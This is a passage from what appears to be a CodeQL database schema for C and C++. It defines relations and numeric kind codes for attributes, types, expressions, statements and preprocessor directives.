// Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case @attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, + int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref +); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. + */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype + | @derivedtype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr | @orlogicalexpr; + +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + ; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. */ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... +| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = @assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = @ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr + | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + +new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: @preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata 